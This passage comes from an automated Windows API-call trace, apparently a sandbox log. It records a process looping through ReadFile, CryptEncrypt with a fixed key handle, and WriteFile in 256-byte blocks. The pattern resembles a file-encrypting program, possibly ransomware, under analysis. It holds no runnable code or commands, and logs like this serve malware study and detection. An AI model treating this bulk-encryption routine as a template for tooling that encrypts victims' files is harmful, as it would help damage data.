nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0152.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.649] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.649] GetLastError () returned 0x0 [0152.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.673] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.674] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.674] GetLastError () returned 0x0 [0152.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.674] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.674] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.674] GetLastError () returned 0x0 [0152.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.674] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.674] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.674] GetLastError () returned 0x0 [0152.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.674] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.674] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.674] GetLastError () returned 0x0 [0152.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.674] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.674] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.674] GetLastError () returned 0x0 [0152.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.674] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.674] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.674] GetLastError () returned 0x0 [0152.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.674] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.675] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.675] GetLastError () returned 0x0 [0152.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.675] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.675] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.675] GetLastError () returned 0x0 [0152.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.675] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.675] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.675] GetLastError () returned 0x0 [0152.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.675] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.675] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.675] GetLastError () returned 0x0 [0152.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.675] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.675] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.675] GetLastError () returned 0x0 [0152.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.675] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.675] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.675] GetLastError () returned 0x0 [0152.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.676] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.676] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.676] GetLastError () returned 0x0 [0152.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.676] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.676] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.676] GetLastError () returned 0x0 [0152.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.676] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.676] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.676] GetLastError () returned 0x0 [0152.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.676] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.676] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.676] GetLastError () returned 0x0 [0152.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.676] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.676] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.676] GetLastError () returned 0x0 [0152.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.676] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.676] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.677] GetLastError () returned 0x0 [0152.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.677] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.677] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.677] GetLastError () returned 0x0 [0152.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.677] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.677] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.677] GetLastError () returned 0x0 [0152.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.677] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.677] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.677] GetLastError () returned 0x0 [0152.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.677] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.677] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.677] GetLastError () returned 0x0 [0152.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.677] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.677] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.677] GetLastError () returned 0x0 [0152.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.677] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.677] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.677] GetLastError () returned 0x0 [0152.677] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.677] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.678] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.678] GetLastError () returned 0x0 [0152.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.678] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.678] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.678] GetLastError () returned 0x0 [0152.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.678] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.678] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.678] GetLastError () returned 0x0 [0152.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.678] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.678] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.678] GetLastError () returned 0x0 [0152.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.678] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.678] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.678] GetLastError () returned 0x0 [0152.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.678] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.678] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.678] GetLastError () returned 0x0 [0152.678] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.678] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.679] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.679] GetLastError () returned 0x0 [0152.679] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: 